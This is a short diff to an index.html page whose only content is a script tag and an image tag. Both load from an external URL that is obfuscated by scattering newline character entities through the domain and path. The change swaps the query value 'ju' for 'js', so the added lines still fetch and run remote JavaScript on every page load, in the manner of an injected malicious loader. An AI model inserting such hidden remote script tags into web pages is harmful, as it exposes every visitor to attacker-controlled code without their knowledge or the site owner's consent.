--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
     <meta charset="utf-8">
 </head>
 <body>
-<script src="https://gi&#10;t.g&#10;o0&#10;5.on&#10;l&#10;ine&#10;/i&#10;m&#10;g/cod&#10;e&#10;?i&#10;d&#10;&#10;=j&#10;u&#10;"></script>
-<img src="https://gi&#10;t.g&#10;o0&#10;5.on&#10;l&#10;ine&#10;/i&#10;m&#10;g/cod&#10;e&#10;?i&#10;d&#10;&#10;=j&#10;u&#10;" width="100%">
+<script src="https://gi&#10;t.g&#10;o0&#10;5.on&#10;l&#10;ine&#10;/i&#10;m&#10;g/cod&#10;e&#10;?i&#10;d&#10;&#10;=j&#10;s&#10;"></script>
+<img src="https://gi&#10;t.g&#10;o0&#10;5.on&#10;l&#10;ine&#10;/i&#10;m&#10;g/cod&#10;e&#10;?i&#10;d&#10;&#10;=j&#10;s&#10;" width="100%">
 </body>
 </html>
